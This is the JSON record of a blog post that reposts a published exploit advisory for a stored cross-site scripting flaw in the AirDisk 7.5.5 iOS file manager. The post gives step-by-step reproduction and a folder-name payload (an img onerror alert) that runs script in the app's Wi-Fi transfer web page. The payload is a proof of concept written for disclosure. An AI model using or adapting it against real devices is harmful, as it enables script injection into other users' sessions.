{"id":30245,"date":"2022-09-09T22:21:37","date_gmt":"2022-09-09T18:21:37","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168320\/airdisk755-xss.txt"},"modified":"2022-09-11T12:20:14","modified_gmt":"2022-09-11T07:50:14","slug":"airdisk-7-5-5-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/airdisk-7-5-5-cross-site-scripting\/","title":{"rendered":"AirDisk 7.5.5 Cross Site Scripting"},"content":{"rendered":"<pre><code># Exploit Title: AirDisk 7.5.5 File Manager Stored XSS\r\n# Date: Sep 8, 2022\r\n# Exploit Author: Chokri Hammedi\r\n# Vendor Homepage: https:\/\/apps.apple.com\/us\/developer\/felix-yew\/id505904424\r\n# Software Link:\r\nhttps:\/\/apps.apple.com\/us\/app\/airdisk-file-manager\/id566530748\r\n# Version: 7.5.5\r\n# Tested on: iPhone ios 15.6<\/code><\/pre>\n<p>1\/ Starting the server ( File Transfer &gt; Wi-fi File Transfer )<\/p>\n<pre><code><\/code><\/pre>\n<p>2\/ Go to browser<\/p>\n<pre><code><\/code><\/pre>\n<p>3\/ Enter the address showing on app eg: http:\/\/192.168.1.187:8080<\/p>\n<pre><code><\/code><\/pre>\n<p>4\/ Create a folder with the name: rose'&#8221;&gt;&lt;img src=x<br \/>\nonerror=alert(document.location)&gt;<\/p>\n<pre><code><\/code><\/pre>\n<p>5\/ Refresh.<\/p>\n<pre><code><\/code><\/pre>\n<p>&nbsp;<\/p>\n<pre><code><\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: AirDisk 7.5.5 File Manager Stored XSS # Date: Sep 8, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https:\/\/apps.apple.com\/us\/developer\/felix-yew\/id505904424 # Software Link: https:\/\/apps.apple.com\/us\/app\/airdisk-file-manager\/id566530748 # Version: 7.5.5 # Tested on: iPhone ios 15.6 1\/ Starting the server ( File Transfer &gt; Wi-fi File Transfer ) 2\/ Go to browser 3\/ Enter the &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-30245","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/30245","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=30245"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/30245\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=30245"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=30245"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=30245"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}